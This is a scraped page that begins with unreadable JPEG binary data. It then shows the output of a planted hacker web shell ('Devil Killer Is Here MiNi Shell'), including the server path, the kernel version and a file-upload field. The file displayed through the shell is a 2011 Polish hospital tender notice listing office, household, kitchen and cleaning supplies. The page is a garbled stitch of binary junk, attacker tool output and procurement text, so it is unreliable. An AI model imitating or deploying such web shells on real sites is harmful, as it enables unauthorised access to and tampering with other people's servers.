JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110215/52639-N-2011.html

<p class="kh_header"><b>Bolesławiec: Dostawa artykułów biurowych, artykułów gospodarstwa domowego i środków czystości, artykułów kuchennych oraz preparatów czyszczących.
Oznaczenie sprawy ET/2/2011</b><br>
<b>Numer ogłoszenia: 52639 - 2011; data zamieszczenia: 15.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital dla Nerwowo i Psychicznie Chorych w Bolesławcu , al. Tysiąclecia 30, 59-700 Bolesławiec, woj. dolnośląskie, tel. 75 7380317 (sekretariat), faks 75 7380301.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalpsychiatryczny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych, artykułów gospodarstwa domowego i środków czystości, artykułów kuchennych oraz preparatów czyszczących.
Oznaczenie sprawy ET/2/2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy artykułów biurowych, artykułów gospodarstwa domowego i środków czystości, artykułów kuchennych oraz preparatów czyszczących na potrzeby Wojewódzkiego Szpitala dla Nerwowo i Psychicznie Chorych w Bolesławcu. Zamawiający dopuszcza składanie ofert częściowych, gdzie część - zadanie stanowi:
Zadanie nr 1	Artykuły biurowe
1.	BRULION A4 W TWARDEJ OPRAWIE	Szt.	20
2.	DZIURKACZ	Szt.	10
3.	KLEJ BIUROWY W TUBIE 50ml	Szt.	180
4.	KOPERTA DO AKT	Szt.	50
5.	KOPERTY DUŻE C 4 a 250 szt.	kart.	30
6.	KOPERTY ŚREDNIE C 5 a 500 szt	kart.	20
7.	KOPERTY MAŁE C 6 a 1000 szt.	kart.	25
8.	KOPERTA 35x43cm (100szt.)	Op.	15
9.	KOPERTA 35x35cm (100szt.)	Op.	15
10.	KOPERTA 30x40cm (100szt.)	Op.	15
11.	KOPERTA 18x24 (100szt.)	Op.	15
12.	KOPERTA 24x30 (100szt.)	Op.	15
13.	KOPERTA B4 ROZSZERZONA	Szt.	100
14.	MARKER OLEJOWY BIAŁY	Szt.	30
15.	MARKER PERMANENTNY CZARNY	Szt.	80
16.	MARKERY CZARNE	Szt.	20
17.	NOŻYCZKI 21cm	szt.	15
18.	OFERTÓWKI A4 a 100 szt.	Op.	60
19.	PAPIER K65HM 110x21	Szt.	60
20.	PAPIER KSERO A-4	ryza	500
21.	PINEZKI op. 100 szt.	Op.	10
22.	PISAKI WODOODPORNE Czarny	Szt.	20
23.	ROLKA DO FAKSU min. 30m	Szt.	40
24.	SEGREGATORY kolorowe Format A 4	Szt.	30
25.	SKOROSZYT Z FAŁDĄ Format A 4	Szt.	2500
26.	SKOROSZYT ZWYKŁY, BIAŁY	szt.	10
27.	SKOROWIDZ Format A 4	szt.	10
28.	SPINACZE BIUROWE 100 szt. op.	Op.	100
29.	TAŚMA GĘSIA SKÓRKA (lub maskująca)	Szt.	40
30.	TAŚMA SZARA KLEJĄCA szer. 5 cm.	Szt.	15
31.	TAŚMA KLEJĄCA BEZBARWNA	Szt.	20
32.	TECZKI BIUROWE WIĄZANE	Szt.	250
33.	TECZKI BIUROWE Z GUMKĄ	Szt.	50
34.	TEMPERÓWKA	Szt.	10
35.	TUSZ DO PIECZĄTEK NIEBIESKI	Szt.	20
36.	ZAKREŚLACZ ŻÓŁTY	Szt.	5
37.	ZESZYTY W KRATKĘ A 5 96 KART. W MIĘKKIEJ OPRAWIE	Szt.	10
38.	ZESZYT W KRATKĘ A4 96K W MIĘKKIEJ OPRAWIE	Szt. 	20
39.	ZESZYT W KRATKĘ A5 64K W MIĘKKIEJ OPRAWIE	szt. 	20
40.	ZSZYWACZ DUŻY NA ZSZYWKI 26-8	Szt.	20
41.	ZSZYWACZE MAŁE	Szt.	20
42.	ZSZYWKI BIUROWE op a 1000 szt  24-6	op.	100
43.	ZSZYWKI BIUROWE op a 1000 szt  26-6	op.	10
44.	ZSZYWKI BIUROWE op a 1000 szt  23-8	op.	15

Zadanie nr 2	Artykuły gospodarstwa domowego i środki czystości
1.	Mleczko do czyszczenia 750 ml 	szt.	60
2.	Denaturat 1l	szt.	20
3.	Druciak spiralny	szt. 	250
4.	Płyn do dezynfekcji wc 750ml lub 1l	szt.	30
5.	Gąbki do mycia chorych 	szt.	50
6.	Kij drewniany z gwintem	szt.	30
7.	Kosz na śmieci  plastikowy 20 litrowy	szt.	20
8.	Kosz pedałowy 20 L	Szt.	15
9.	Mata antypoślizgowa	szt.	25
10.	Miska plastikowa AE38	szt.	40
11.	Miotła na kiju	szt.	50
12.	Mop bawełniany kieszeniowy 40cm (ma być wewnętrzny wimiar głębokści min. 11,5)	szt.	300
13.	Stelaż mop	szt.	20
14.	Papier toaletowy Big Rola	szt.	500
15.	Płyn do mycia paneli	szt. 	25
16.	Pasta woskowa do paneli 1l	szt.	25
17.	Żel BHP 0,5	szt.	60
18.	Proszek do prania 600g	szt.	60
19.	Proszek do szorowania 500g	szt.	250
20.	Reklamówki jednorazowe średnie 200szt.	opak.	60
21.	Rękawice gospodarcze rozmiar M	par	100
22.	Rękawice gospodarcze rozmiar S	par	90
23.	Rękawice gospodarcze rozmiar L	par	20
24.	Szczotki do szorowania drewna	szt.	10
25.	Ścierki do kurzu różnokolorowe o wymiarach min. 30x35               (1 opak.=5szt.) 	opak.	700
26.	Ścierka do podłogi	szt.	30
27.	Szczotka do zamiatana drewniana	szt.	30
28.	Szczotka wc + pojemnik	kpl.	50
29.	Wiadro metalowe emaliowane 10l bez pokrywy	szt.	10
30.	Wiadro plastikowe 10l bez pokrywy	szt.	5
31.	Wiadro plastikowe z pokrywą 10l 	szt.	10
32.	Wycieraczki do obuwia o wym 60cm x 40cm	szt.	10
33.	Wycieraczka przemysłowa	szt.	5
34.	Garnek emaliowany 3 litrowy	szt.	5
35.	Zmiotka +szufelka	kpl.	25

Zadanie nr 3	Artykuły kuchenne
1.	Dzbanki do herbaty (plastikowe) 2l	szt.	10
2.	Cerata	mb	20
3.	Chochla wazowa mała	szt.	10
4.	Talerz deserowy 	szt.	150
5.	Talerz głęboki	szt.	200
6.	Talerz płytki	szt.	100
7.	Łyżeczka metalowa	szt. 	30
8.	Łyżka stołowa, metalowa	szt. 	30
9.	Łyżka drewniana 	szt.	20
10.	Nóż metalowy z ostrzem stałym	szt.	20
11.	Widelec stołowy, metalowy	szt.	20
12.	Garnek średni 5L, 3L	szt.	20
13.	Kubki barowe ceramiczne	szt. 	250
14.	Kubki jednorazowe (op.=100szt.)	op.	20
15.	Waza do zupy	szt.	10

Zadanie nr 4	Preparaty czyszczące
1	Preparat do mycia i pielęgnacji podłóg pokrytych również powłokami zabezpieczającymi, niepozostawiający smug, utrzymujący połysk o delikatnym zapachu, szybkoschnący, zawierający anionowe i niejonowe substancje powierzchniowo czynne, nanocząsteczki krzemu, etanol, środki wspomagające, konserwujące, zapachowe działający w roztworach roboczych nieprzekraczających 0,25%		
	Butelka 1 L	Szt.	30
	Kanister 10L	Szt.	120
2	Preparat do mycia powierzchni ponad podłogą, szybkoschnący, nie pozostawiający smug, odświeżający, tworzący błyszczącą powłokę o przyjemnym zapachu, zawierający anionowe i niejonowe substancje powierzchniowo czynne, alkohol etylowy, z dodatkiem komponentów zapachowych. Działanie w roztworach nie większych niż 0,25%		
	Butelka 1L	Szt.	30
	Kanister 10L	Szt.	72
3	Preparat myjący o działaniu antybakteryjnym do mycia sanitariatów , posiadający inhibitory korozji, usuwający kamień, rdzę, zanieczyszczenia pochodzenia nieorganicznego , nacieki wodne ,nadający połysk o świeżym zapachu . Na bazie kwasu amidosulfonowego, kwasu fosforowego, niejonowych substancji powierzchniowo czynnych. Działający w roztworach roboczych do 1%		
	Butelka 1L	Szt.	50
	Kanister 10L	Szt.	72
4	Preparat czyszcząco- odkamieniający do urządzeń kuchennych, mających kontakt z żywnością, zmywarek do mycia naczyń, czajników posiadający inhibitory korozji, niskopieniący, bezzapachowy, nabłyszczający myte powierzchnie. Na bazie kwasu fosforowego, alkoholu tłuszczowego, niezawierający kwasu solnego, octowego. Działający w roztworach roboczych do 0,25%		
	Butelka 1 L	Szt.	50
	Kanister 10 L	Szt.	40
5	Preparat do mycia zanieczyszczeń tłuszczowych i czyszczenia wszystkich powierzchni kuchennych, mających kontakt z żywnością, zawierający inhibitory korozji, posiadający właściwości separacji tłuszczów, bezzapachowy, zawierający wodorotlenek sodowy, alkohol , związki powierzchniowo czynne. Nieniszczący pow. emaliowanych. Działający w roztworze roboczym do 5%		
	Butelka 1L	Szt.	240
6	Preparat do mycia powierzchni i przedmiotów szklanych oraz szkliwionych. Nie pozostawiający smug i zacieków, posiadający dopuszczenie do stosowania w zakł. przemysłu spożywczego do czyszczenia powierzchni mających kontakt z żywnością. Zawierający związki powierzchniowo czynne(tenzydy), alkohol, amoniak i barwnik, działający w roztw. roboczym do 1%
		
	 Kanister 10L
	Szt.	30
7	Środek do mycia podłóg z kamienia naturalnego, gresu, lastryka, usuwający zabrudzenia występujące na pow. kamiennych (mikropory) zawierający w składzie zmydlone kwasy tłuszczowe pochodzenia roślinnego, anionowe zw. powierzchniowo czynne, czynniki kompleksujące substancje pomocnicze i zapachowe, działający w roztw. rob. do 1% butelka 1L	Szt.	12
8	Płyn do mycia naczyń szklanych, luster, laminatów skoncentrowany 1litr	Szt.	600
9	Płyn do mycia naczyń szklanych, luster 5l skoncentrowany	Szt.	320
10	Mydło w płynie 5l.o działaniu antybakteryjnym, w konsystencji zapobiegającej samoistnemu wyciekaniu z dozowników o właściwościach pielęgnujących skórę o neutralnym ph i zawartości gliceryny poniżej 3%	Szt.	320
11	Pojemnik na pojedyncze ręczniki jednorazowe w listkach składanych ZZ, wymiar listka 23cmx25cm	Szt.	50
12	Dozownik naścienny na mydło, uruchamiany bez dotykania dłońmi	Szt.	40
13	Proszek, preparat myjący do automatycznych zmywarek naczyń, niskopieniący o przeciętnym dozowaniu 2-4g na 1l wody pojemność 10kg	Szt.	36
14	Nabłyszczasz do zmywarek 10l zapobiegający odkł. się osadów wapniowych, nie pozostawiający zacieków i smug	Szt.	36
15	Papier toaletowy mała rolka, szary, gofrowany o długości wstęgi min.50 m, szerokości wstęgi 9 cm. Gramatura papieru 36g-m2 , białość 45-50%.	Szt.	4000
16	Ręcznik jednorazowy w rolce,szer.23cm	Op.	1200
17	Ręcznik jednorazowy w listkach składanych w Z zielone, jednowarstwowe o wymiarach listka 23x25cm o gramaturze 38-40 g-m, gofrowany, nierozpuszczalny w wodzie. Opakowanie karton 4000 szt.	Op.	400
18	Gąbka kuchenna do mycia naczyń o wym. min 5x9x4cm	Szt.	1500
Uwaga do zadania 4: Wszelkie wymagane przez Zamawiającego parametry muszą być udokumentowane dołączonymi kartami charakterystyki oraz opisami technicznymi. Do każdego preparatu, który nie jest gotowy do użycia należy dołączyć nieodpłatnie w trakcie trwania umowy miarki umożliwiające przygotowanie prawidłowego roztworu roboczego. Ponadto zamawiający zobowiązuje oferenta do nieodpłatnego użyczenia, co najmniej 11 systemów dozujących 3 roztworów roboczych na czas trwania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.00.00.00-2, 30.00.00.00-9, 33.00.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę wraz z wypełnionym formularzem oferty dokumentów i oświadczeń, o których mowa w rozdziale VI SIWZ, zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę wraz z wypełnionym formularzem oferty dokumentów i oświadczeń, o których mowa w rozdziale VI SIWZ, zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę wraz z wypełnionym formularzem oferty dokumentów i oświadczeń, o których mowa w rozdziale VI SIWZ, zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę wraz z wypełnionym formularzem oferty dokumentów i oświadczeń, o których mowa w rozdziale VI SIWZ, zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę wraz z wypełnionym formularzem oferty dokumentów i oświadczeń, o których mowa w rozdziale VI SIWZ, zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2.	Oferta musi zawierać następujące dokumenty:
2.1.	Formularz oferty (załącznik nr 1 do SIWZ)
2.2.	Wymagane oświadczenia i dokumenty potwierdzające:
A.	Spełnienie warunków z art. 22 ust 1 ustawy Pzp (załącznik nr 2 do SIWZ)
B.	Brak podstaw do wykluczenia z mocy art. 24 ust. 1 ustawy Pzp (załącznik nr 3 do SIWZ)
C.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
D.	Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące prze upływem terminu składania ofert.
2.3.	Zaakceptowany projekt umowy (załącznik nr 4 do SIWZ)

Informacje stanowiące tajemnicę przedsiębiorstwa Wykonawcy powinny zostać przekazane w taki sposób, by Zamawiający mógł z łatwością określić zakres informacji objętych tajemnicą. Brak stosownego zastrzeżenia będzie traktowany jako jednoznaczny ze zgodą na włączenie całości przekazanych dokumentów i danych do dokumentacji postępowania oraz ich ujawnienie.
Wykonawca, który zamierzy powierzyć podwykonawcom wykonanie jakiejkolwiek części zamówienia, zobowiązany jest wskazać na formularzu oferty zakresy prac powierzane podwykonawcom. Brak jakiejkolwiek wzmianki w tym zakresie na formularzu oferty będzie uznawany jako stwierdzenie samodzielnego wykonania zamówienia.

3. Oferta składana przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia powinna zawierać:
3.1.	Formularz oferty (załącznik nr 1 do SIWZ)
3.2.	Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 pkt 1 ustawy Pzp (załącznik nr 2 do SIWZ) złożone przez każdego Wykonawcę
3.3.	Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 pkt 2-4 ustawy Pzp (załącznik nr 2 do SIWZ) złożone w imieniu wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia
3.4.	Oświadczenie każdego z Wykonawców o braku podstaw do wykluczenia z art. 24 ust. 1 ustawy Pzp (załącznik nr 3 do SIWZ)
3.5.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, złożony przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia
3.6.	Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące prze upływem terminu składania ofert, złożone przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
3.7.	Zaakceptowany projekt umowy (załącznik nr 4 do SIWZ)
3.8.	Pełnomocnictwo dla pełnomocnika ustanowionego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (pełnomocnictwo powinno być załączone w oryginale lub kopii potwierdzonej za zgodność).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalpsychiatryczny.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital dla Nerwowo i Psychicznie Chorych w Bolesławcu
Aleja Tysiąclecia 30, 59-700 Bolesławiec,pawilon administracji (dział organizacyjno - prawny, pok. 106).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2011 godzina 10:00, miejsce: Wojewódzki Szpital dla Nerwowo i Psychicznie Chorych w Bolesławcu
Aleja Tysiąclecia 30, 59-700 Bolesławiec, Sekretariat Szpitala, pok. 101 (pawilon administracji).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
